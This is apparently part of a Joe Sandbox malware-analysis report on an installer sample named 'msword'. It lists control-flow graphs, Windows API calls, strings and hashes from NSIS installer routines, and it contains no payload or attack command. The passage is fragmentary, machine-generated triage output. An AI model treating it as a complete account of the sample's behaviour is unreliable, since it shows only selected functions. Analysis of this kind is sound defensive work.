                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 4283519449-527102705
                                          • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                          • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                          • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                          • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 688 403561 674->688 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 689 403455-40345e 679->689 682->683 683->664 690 40358d-40359f WriteFile 683->690 688->672 691 403464-403484 call 4076a0 689->691 692 4035a1-4035a4 690->692 693 40353f-403541 690->693 697 403538-40353a 691->697 698 40348a-40349d GetTickCount 691->698 692->693 696 4035a6-4035a9 692->696 693->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 703 40352d-403530 699->703 704 4034ee-4034f1 699->704 701 4034a9-4034ad 700->701 702 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->702 701->699 701->702 709 4034e5 702->709 703->673 705 403536 703->705 707 403513-40351e 704->707 708 4034f3-403507 WriteFile 704->708 705->672 711 403521-403525 707->711 708->693 710 403509-40350c 708->710 709->699 710->693 712 40350e-403511 710->712 711->691 713 40352b 711->713 712->711 713->672
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004033F1
                                          • GetTickCount.KERNEL32 ref: 00403492
                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                          • wsprintfW.USER32 ref: 004034CE
                                          • WriteFile.KERNELBASE(00000000,00000000,004283D1,00403792,00000000), ref: 004034FF
                                          • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: CountFileTickWrite$wsprintf
                                          • String ID: (]C$... %d%%$pAB
                                          • API String ID: 651206458-3635341587
                                          • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                          • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                          • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                          • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 724 404ff5-404ff9 lstrcatW 720->724 725 40506c-40506d 720->725 722 405011-405015 721->722 723 405004-40500b SetWindowTextW 721->723 726 405017-405059 SendMessageW * 3 722->726 727 40505b-40505d 722->727 723->722 724->721 725->716 726->727 727->725 728 40505f-405064 727->728 728->725
                                          APIs
                                          • lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
                                          • lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
                                          • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
                                          • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                          • String ID:
                                          • API String ID: 2740478559-0
                                          • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                          • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                          • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                          • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f69 GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 745 401f6e-401f7b 732->745 739 401f3c-401f4e call 406035 733->739 740 401f2c-401f36 call 4062cf 733->740 747 401ee4-402702 call 406831 734->747 735->731 736 401ed1-401ed3 735->736 736->734 742 401ef7-402e50 call 406035 * 3 736->742 751 402387-40238d GlobalFree 739->751 740->739 750 4030e3-4030f2 742->750 745->750 745->751 762 402708-40270e 747->762 751->750 762->750
                                          APIs
                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                          • GlobalFree.KERNEL32(007EE200), ref: 00402387
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: FreeGloballstrcpyn
                                          • String ID: 229$Exch: stack < %d elements$Pop: stack empty
                                          • API String ID: 1459762280-2572911037
                                          • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                          • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                          • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                          • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 764 402713-40273b call 406035 * 2 769 402746-402749 764->769 770 40273d-402743 call 40145c 764->770 772 402755-402758 769->772 773 40274b-402752 call 40145c 769->773 770->769 774 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 772->774 775 40275a-402761 call 40145c 772->775 773->772 775->774
                                          APIs
                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWritelstrcpyn
                                          • String ID: 229$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                          • API String ID: 247603264-2725386541
                                          • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                          • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                          • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                          • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
                                          APIs
                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          Strings
                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                          • API String ID: 3156913733-2180253247
                                          • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                          • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                          • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                          • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 809 405ef5-405ef8 807->809 808->806 810 405ef2 808->810 810->809
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405EC9
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: nsa
                                          • API String ID: 1716503409-2209301699
                                          • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                          • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                          • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                          • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 819 4021aa-4021b0 EnableWindow 816->819 820 40219f-4021a5 ShowWindow 816->820 817->816 822 4030e3-4030f2 819->822 820->822
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                          • String ID: HideWindow
                                          • API String ID: 1249568736-780306582
                                          • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                          • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                          • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                          • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                          • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                          • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                          • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                          • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                          • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                          • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                          • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                          • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                          • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                          • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                          • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                          • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                          APIs
                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                          • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
